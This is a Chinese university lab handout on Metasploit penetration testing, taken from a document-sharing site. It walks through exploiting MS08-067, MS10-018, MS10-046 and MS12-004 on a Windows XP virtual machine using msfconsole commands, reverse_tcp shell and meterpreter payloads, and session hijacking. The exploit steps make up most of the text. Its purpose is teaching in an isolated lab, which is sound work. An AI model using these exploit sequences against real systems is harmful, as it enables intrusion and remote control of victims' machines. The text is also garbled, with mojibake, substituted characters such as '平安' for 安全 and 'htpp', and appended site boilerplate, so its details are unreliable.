




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、-. z.計(jì)算機(jī)系統(tǒng)平安 實(shí)驗(yàn)二:操作系統(tǒng)平安與metasploit滲透測(cè)試實(shí)驗(yàn)?zāi)康模簩W(xué)習(xí)計(jì)算機(jī)操作系統(tǒng)平安相關(guān)容。學(xué)習(xí)操作系統(tǒng)滲透相關(guān)容學(xué)習(xí)metasploit滲透工具使用。實(shí)驗(yàn)原理:Windows 操作系統(tǒng)平安構(gòu)造網(wǎng)絡(luò)滲透原理實(shí)驗(yàn)環(huán)境:軟件: vmware 8.0環(huán)境下,虛擬機(jī), vm-Win*P鏡像虛擬機(jī),backtrack 4及backtrack 5 虛擬機(jī)鏡像 等。實(shí)驗(yàn)拓?fù)洌罕粷B透機(jī): 使用虛擬機(jī)*P,建議使用未安裝更新的英文*P操作系統(tǒng), 設(shè)置其IP地址為,自動(dòng)獲得,虛擬機(jī)網(wǎng)絡(luò)連接方式 NAT方式。實(shí)驗(yàn)室計(jì)算機(jī)network系統(tǒng)下中network_vm 目錄中有metasploit
2、able_*P,可使用之。滲透測(cè)試機(jī): 使用Bt4或5作為操作系統(tǒng),準(zhǔn)備工作:?jiǎn)?dòng)兩臺(tái)虛擬機(jī),按上圖方式設(shè)置,請(qǐng)先記錄下兩臺(tái)虛擬機(jī)的IP:被滲透機(jī):操作系統(tǒng):_windows *p with sp1_IP地址: 滲透測(cè)試機(jī):操作系統(tǒng):_bt5_IP地址:(注意,假設(shè)網(wǎng)絡(luò)連接未啟用,請(qǐng)先啟用之,linu* 下可使用ifup eth0)實(shí)驗(yàn)容:第一局部:針對(duì)操作系統(tǒng)部效勞端口進(jìn)展?jié)B透了解ms08-067漏洞詳情:請(qǐng)課后上網(wǎng)查詢相關(guān)容漏洞描述:曾經(jīng)的沖擊波、震蕩波等大規(guī)模攻擊都是由于Windows的RPC效勞漏洞造成的,MS08-067遠(yuǎn)程溢出漏洞也不例外。MS08-067遠(yuǎn)程溢出漏洞的原因是由于W
3、indows系統(tǒng)中RPC存在缺陷造成的,Windows系統(tǒng)的Server效勞在處理特制RPC請(qǐng)求時(shí)存在緩沖區(qū)溢出漏洞,遠(yuǎn)程攻擊者可以通過(guò)發(fā)送惡意的RPC請(qǐng)求觸發(fā)這個(gè)溢出,如果受影響的系統(tǒng)收到了特制偽造的RPC請(qǐng)求,可能允許遠(yuǎn)程執(zhí)行代碼,導(dǎo)致完全入侵用戶系統(tǒng),以SYSTEM權(quán)限執(zhí)行任意指令并獲取數(shù)據(jù),并獲取對(duì)該系統(tǒng)的控制權(quán),造成系統(tǒng)失竊及系統(tǒng)崩潰等嚴(yán)重問(wèn)題。漏洞對(duì)象:受MS08-067遠(yuǎn)程溢出漏洞影響的系統(tǒng)非常多,受影響的操作系統(tǒng)有Windows *P /2000/Vista/2003等。除Windows Server 2008 Core外,根本上所有的Windows系統(tǒng)都會(huì)遭受此漏洞的攻擊,特
4、別是在Windows 2000、Windows *P和Windows Server 2003系統(tǒng),攻擊者可以利用此漏洞無(wú)需通過(guò)認(rèn)證運(yùn)行任意代碼。這個(gè)漏洞還可能被蠕蟲(chóng)利用,此平安漏洞可以通過(guò)惡意構(gòu)造的網(wǎng)絡(luò)包直接發(fā)起攻擊,并且攻擊者可以獲取完整權(quán)限,因此該漏洞很可能會(huì)被用于制作蠕蟲(chóng)以進(jìn)展大規(guī)模的攻擊。漏洞端口:_445_步驟一:?jiǎn)?dòng)metasploit 控制臺(tái)msfconsole記錄其步驟二:搜索模塊 ms08-067號(hào)模塊search ms08-067找到模塊,記錄其名稱,級(jí)別,描述步驟三:使用這個(gè)模塊use windows/smb/ms08_067_netapi步驟四:查找有用的payload
5、sshow payloads步驟五:使用其中最常用的一個(gè)payloadset payload windows/shell/reverse_tcp步驟六:查看當(dāng)前的這個(gè)payload 以及攻擊所需要的參數(shù)選項(xiàng)show options發(fā)現(xiàn)模塊所需要選項(xiàng),有些有默認(rèn)參數(shù): RPORT ,SMBPIPE 有些沒(méi)有 RHOST 發(fā)現(xiàn)payload所需要參數(shù),有些有默認(rèn)參數(shù): E*ITFUNC ,LPORT 有些沒(méi)有 : LHOST 滲透的目標(biāo)設(shè)置值 : 0 步驟七:設(shè)置參數(shù)set RHOST *.*.*.* 被滲透主機(jī)的IP地址set LHOST *.*.*.*滲透測(cè)試主機(jī)的IP地址。步驟八:show
6、options 查看當(dāng)前參數(shù)設(shè)置是否齊全。步驟九:show targets 查看當(dāng)前攻擊的目標(biāo)。0 假設(shè)有,則表示可進(jìn)展自動(dòng)選擇攻擊。其他,則為特定選擇特定系統(tǒng)。步驟十:參數(shù)齊全,目標(biāo)選定,滲透載荷準(zhǔn)備就緒,然后實(shí)施。e*ploit滲透開(kāi)場(chǎng)。自動(dòng)創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當(dāng)前控制的計(jì)算機(jī)是哪臺(tái)。 翻開(kāi)放大鏡:步驟十一:E*it 然后再e*it退出。第二局部:針對(duì)操作系統(tǒng)下的瀏覽器進(jìn)展?jié)B透步驟一:瀏覽器漏洞MS10-018了解ms10-018漏洞詳情:請(qǐng)課后上網(wǎng)查詢相關(guān)容漏洞描述: 在提交數(shù)據(jù)時(shí)Internet E*plorer處理使用特制編碼字符串的
7、容的方式存在信息泄露漏洞。攻擊者可以通過(guò)創(chuàng)立特制的網(wǎng)頁(yè)來(lái)利用這個(gè)漏洞,如果用戶查看了該網(wǎng)頁(yè)就會(huì)導(dǎo)致信息泄露。成功利用這個(gè)漏洞的攻擊者可以查看本地計(jì)算機(jī)或其他域或Internet E*plorer區(qū)中的其他瀏覽器窗口的容。漏洞對(duì)象:Microsoft_Internet_E*plorer_7.0 Microsoft_Internet_E*plorer_6.0_SP1 Microsoft_Internet_E*plorer_6.0 Microsoft _Internet _E*plorer _5.0.1_ SP4漏洞端口: 8080 步驟一:?jiǎn)?dòng)metasploit 控制臺(tái)msfconsole步驟二
8、:搜索模塊 ms10-018號(hào)模塊search ms10-018找到模塊,記錄其名稱,級(jí)別,描述步驟三:使用這個(gè)模塊use windows/browser/ms10_018_ie_behaviors步驟四:查找有用的payloadsshow payloads步驟五:使用其中最常用的一個(gè)payloadset payload windows/shell/reverse_tcp步驟六:查看當(dāng)前的這個(gè)payload 以及攻擊所需要的參數(shù)選項(xiàng)show options發(fā)現(xiàn)模塊所需要選項(xiàng),有些有默認(rèn)參數(shù): SRVHOST,SRVPORT,SSL,SSLVersion 有些沒(méi)有 : URIPATH 發(fā)現(xiàn)pay
9、load所需要參數(shù),有些有默認(rèn)參數(shù): E*ITFUNC,LPORT 有些沒(méi)有 : LHOST 步驟七:設(shè)置SRVHOST 和LHOST 都設(shè)置為滲透測(cè)試機(jī) IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可設(shè)置為 0滲透準(zhǔn)備e*ploit 則列出一URL如:using url : htpp:/*.*.*.*:8080/qte30235fs暫時(shí)滲透到此(注意其中的qte30235fs為自動(dòng)產(chǎn)生)在當(dāng)對(duì)方機(jī)器 使用htpp:/*.*.*.*:8080/qte30235fs時(shí),sessions產(chǎn)生使用sessions 來(lái)獲知sessionsessions -
10、i 1直接將session 轉(zhuǎn)到shell中創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當(dāng)前控制的計(jì)算機(jī)是哪臺(tái)翻開(kāi)寫字板:第三局部:針對(duì)操作系統(tǒng)下類似快捷方式使用進(jìn)展?jié)B透步驟一:瀏覽器漏洞MS10-046了解ms10-046漏洞詳情:請(qǐng)課后上網(wǎng)查詢相關(guān)容漏洞描述:Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,點(diǎn)擊LNK文件與點(diǎn)擊快捷方式所指定的目標(biāo)具有一樣的效果。Windows沒(méi)有正確地處理LNK文件,特制的LNK文件可能導(dǎo)致Windows自動(dòng)執(zhí)行快捷方式文件所指定的代碼。這些代碼可能位于USB驅(qū)動(dòng)、本地 或遠(yuǎn)程文件系統(tǒng)、光驅(qū)或其他位置,
11、使用資源管理器查看了LNK文件所在位置就足以觸發(fā)這個(gè)漏洞。默認(rèn)下Windows啟動(dòng)了自動(dòng)加載和自動(dòng)播放功能,因此 在連接可移動(dòng)設(shè)備如USB閃存后Windows會(huì)自動(dòng)翻開(kāi)資源管理器。其他顯示文件圖標(biāo)的應(yīng)用也可用作這個(gè)漏洞的攻擊載體。漏洞對(duì)象:Microsoft Windows *P SP3Microsoft Windows *P SP2Microsoft WindowsVistaSP2Microsoft WindowsVistaSP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Se
12、rver 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7漏洞端口:_80_步驟一:?jiǎn)?dòng)metasploit 控制臺(tái)msfconsole步驟二:搜索模塊 ms10-046號(hào)模塊search ms10-046找到模塊,記錄其名稱,級(jí)別,描述步驟三:使用這個(gè)模塊use windows/browser/ms10_046_shortcut_icon_dllloader步驟四:查找有用的payloadsshow payloads步驟五:使用其中最常用的一個(gè)payloadset payload windows/shell/reverse
13、_tcp步驟六:查看當(dāng)前的這個(gè)payload 以及攻擊所需要的參數(shù)選項(xiàng)show options發(fā)現(xiàn)模塊所需要選項(xiàng),有些有默認(rèn)參數(shù): SRVPORT ,SRVHOST ,URIPATH 有些沒(méi)有 UNCHOST 發(fā)現(xiàn)payload所需要參數(shù),有些有默認(rèn)參數(shù): E*ITFUNC ,LPORT 有些沒(méi)有 : LHOST 步驟七:設(shè)置SRVHOST 和LHOST 都設(shè)置為滲透測(cè)試機(jī) IPset SRVHOST *.*.*.*set LHOST *.*.*.*設(shè)置瀏覽的URLset URIPATH hzs.html (其中hzs 為你的的首字母)target 可設(shè)置為 0滲透準(zhǔn)備e*ploit 報(bào)錯(cuò),說(shuō)
14、明URIPATH不能改動(dòng),需要改回默認(rèn)值重新e*ploit則列出一URL如:using url : htpp:/*.*.*.*:8080/hzs.html暫時(shí)滲透到此在當(dāng)對(duì)方機(jī)器 使用如:using url : htpp:/*.*.*.*:8080/hzs.html時(shí),sessions產(chǎn)生使用sessions 來(lái)獲知sessionsessions -i 1直接將session 轉(zhuǎn)到shell中創(chuàng)立一shell (命令提示符使用ipconfig 及dir等命令確定當(dāng)前控制的計(jì)算機(jī)是哪臺(tái)翻開(kāi)任務(wù)管理器:使用taskmgr命令*第四局部:滲透時(shí)使用meterpreter工具。瀏覽器漏洞MS12-00
15、4Windows Media Player是系統(tǒng)的多媒體播放組件。WMP在處理畸形構(gòu)造的MIDI數(shù)據(jù)時(shí)存在存破壞漏洞,遠(yuǎn)程攻擊者可能利用此漏洞通過(guò)誘使用戶訪問(wèn)惡意網(wǎng)頁(yè)控制用戶系統(tǒng)。受影響系統(tǒng):Microsoft Windows *P ProfessionalMicrosoft Windows *P Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows Server 2008Microsoft Windows Server 2003 Web EditionMicrosof
16、t Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7啟動(dòng)msfconsolesearch ms12_004搜索不到該模塊得到相關(guān)結(jié)果為windows/browser/ms12_004_midi使用它use windows/browser/ms12_004_midi查看 payloadsshow payloadsset payload windo
17、ws/meterpreter/reverse_tcp查看相關(guān)的選項(xiàng)optionsshow options有SRVHOST SRVPORT SSL及SSL version為模塊的參數(shù)有E*ITFUNC和LHOST 及LPORT作為payload的參數(shù)。還有target 設(shè)置設(shè)置SRVHOST 和LHOST 都設(shè)置為本地IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可設(shè)置為 0set URLPATH certsrv.html滲透準(zhǔn)備e*ploit 則列出一URL如:using *.*.*.*:8080/certsrv.html暫時(shí)滲透到此在當(dāng)對(duì)方機(jī)器 使用*.*.*.*:8080
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 紙漿設(shè)備轉(zhuǎn)讓協(xié)議書
- 項(xiàng)目轉(zhuǎn)讓協(xié)議書模板
- 家屬不認(rèn)補(bǔ)償協(xié)議書
- 學(xué)籍檔案托管協(xié)議書
- 兄妹繼承相爭(zhēng)協(xié)議書
- 快遞保險(xiǎn)協(xié)議書范本
- 商場(chǎng)商鋪轉(zhuǎn)租協(xié)議書
- 物業(yè)相關(guān)事項(xiàng)協(xié)議書
- 特聘專家調(diào)解協(xié)議書
- 事故終結(jié)處理協(xié)議書
- 干部檔案專項(xiàng)審核工作重點(diǎn)難點(diǎn)問(wèn)題
- 創(chuàng)造性思維與創(chuàng)新方法Triz版知到章節(jié)答案智慧樹(shù)2023年大連理工大學(xué)
- 室外消防鋼絲網(wǎng)骨架塑料復(fù)合PE管施工及方案
- 大念住經(jīng) 排版用于打印
- 《產(chǎn)業(yè)基礎(chǔ)創(chuàng)新發(fā)展目錄(2021年版)》(8.5發(fā)布)
- GB/T 31266-2014過(guò)磷酸鈣中三氯乙醛含量的測(cè)定
- GB/T 16422.3-2014塑料實(shí)驗(yàn)室光源暴露試驗(yàn)方法第3部分:熒光紫外燈
- 計(jì)量器具校準(zhǔn)記錄
- DB36-T 1694-2022 餐廚垃圾集約化養(yǎng)殖黑水虻技術(shù)規(guī)程
- 技術(shù)合同認(rèn)定登記培訓(xùn)課件
- 十二講船舶制冷裝置課件
評(píng)論
0/150
提交評(píng)論